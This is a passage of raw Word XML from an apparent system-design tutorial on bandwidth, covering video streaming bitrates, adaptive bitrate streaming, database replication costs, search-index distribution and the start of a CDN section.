            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bitrate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E1EB56" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Per-user Bandwidth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0E005C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1M concurrent users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="10F01D2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8A0ED1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>480p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6744FD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1.5 Mbps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CE6850" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1.5 Mbps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84AD11" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1.5 Tbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="7E3719F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9B0894" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>720p</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A5046F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>3 Mbps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A7FB08" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>3 Mbps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561A2E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>3 Tbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="6E0118E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ED29D3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1080p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6A4390" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>5–8 Mbps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AEE932" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>5–8 Mbps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34DCA3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>5–8 Tbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="275D9AD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253EE5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>4K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EA9D1A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>15–25 Mbps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99B3FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>15–25 Mbps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9A6D3E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>15–25 Tbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D094613" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Netflix handles this bandwidth (30+ Tbps globally):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2344B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open Connect CDN:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Netflix places its own cache servers inside ISP networks. Traffic never leaves the ISP → no transit bandwidth costs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D28F1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-positioning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Popular content is pushed to edge servers during off-peak hours (overnight). During peak hours, 95% of traffic is served locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D887D98" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adaptive bitrate:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Client measures available bandwidth in real-time. If bandwidth drops (congestion), switches to lower quality. If bandwidth increases, upgrades.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846F41B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Efficient encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Each title is encoded at multiple bitrates (20+ profiles). Per-title encoding optimizes quality-per-bit for each piece of content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750F7903" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adaptive Bitrate Streaming (ABR) — How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA253AF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07715A7D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Available profiles for a video:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A90EE8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  - 480p:  1.5 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD952D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  - 720p:  3.0 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0040B059" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  - 1080p: 5.0 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA075F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  - 4K:    15.0 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B99478" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="45816FFF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>User's available bandwidth: fluctuating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B27084" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="05933A7E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Time 0–10s:   Bandwidth = 8 Mbps → Serve 1080p (5 Mbps, safe margin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C37B2A3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Time 10–20s:  Bandwidth drops to 2 Mbps → Switch to 480p (1.5 Mbps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCD0043" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Time 20–30s:  Bandwidth recovers to 12 Mbps → Switch to 1080p, then 4K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768FFDA7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Video is divided into 2–10 second chunks. Each chunk is available in all quality levels. The client requests the next chunk at the appropriate quality based on recent measured bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D02DE7E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Database Replication Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E2DC3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronous replication bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACE6F34" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8CDDCD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Write rate: 5,000 writes/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4325FF5A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average write size (WAL entry): 500 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C1FF88" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Replication bandwidth per replica: 5,000 × 500 = 2.5 MB/s = 20 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6474C418" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Manageable for same-region replicas (&lt; 1ms latency, plenty of bandwidth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93B5B1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cross-region replication problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE3380" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Same 20 Mbps, but 100ms RTT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA7411" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>BDP = 20 Mbps × 100ms = 2 Mbit = 250 KB in flight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F437D59" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP window must be ≥ 250 KB to sustain 20 Mbps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CC2FC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1139"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Single TCP connection with default settings handles this easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40F691" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>But at higher write volumes (100,000 writes/sec):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FFB49" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5397D47E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth: 100,000 × 500 = 50 MB/s = 400 Mbps per replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFCFBA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BDP: 400 Mbps × 100ms = 40 Mbit = 5 MB in flight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1390BFE8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Still manageable, but now cross-region bandwidth costs become significant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331ED6A4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D1444" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>50 MB/s × 86,400 sec/day = 4.3 TB/day × $0.02/GB = $86/day per replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F4182" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Multiple replicas × multiple regions → $10,000+/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA0D2AB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Optimization — WAL compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BEDE09" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Compress WAL before replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3058D909" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>LZ4 compression of WAL: ~60% reduction for typical writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8AF8F9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>50 MB/s → 20 MB/s after compression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7E45F7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cost savings: ~$50/day instead of $86/day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704F08F1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1140"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Trade: CPU for compression (negligible for LZ4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2316FB44" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Search Engine Index Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B220F7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A search index is 500 GB. You have 50 search replicas across 5 regions. How do you distribute updates?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A78597" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full index rebuild (monthly):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBCADDF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6730CF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>500 GB × 50 replicas = 25 TB of data transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC84526" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Even at 10 Gbps: 25 TB / 10 Gbps = 20,000 seconds = 5.5 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10119561" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cross-region at 1 Gbps: 55 hours (not feasible as a single transfer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C6429" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Incremental index segments (daily):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB3C08" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FACF29" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Daily updates: 5% of index = 25 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E9F99D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>25 GB × 50 replicas = 1.25 TB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B19CBD6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>At 10 Gbps: 1000 seconds = 17 minutes (feasible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ADA0E1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Optimized distribution (tree topology):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B01A88C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ABEC0F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Instead of origin → 50 replicas (50x bandwidth at origin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BD631" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin → 5 regional leaders → each leader → 10 local replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A4C800" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Origin sends 25 GB × 5 = 125 GB (not 25 GB × 50 = 1.25 TB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A999CAA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each leader sends 25 GB × 10 = 250 GB (within the region, cheap bandwidth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621BF88D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>This is how BitTorrent-style distribution works — nodes act as both consumers and producers, reducing the load on the origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661B2E69" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8.4 CDN and Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD04F48" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why CDNs exist (from a bandwidth perspective):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417E4E87" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Without CDN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259774ED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1141"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>1 million users request a 2 MB homepage image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D6072" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
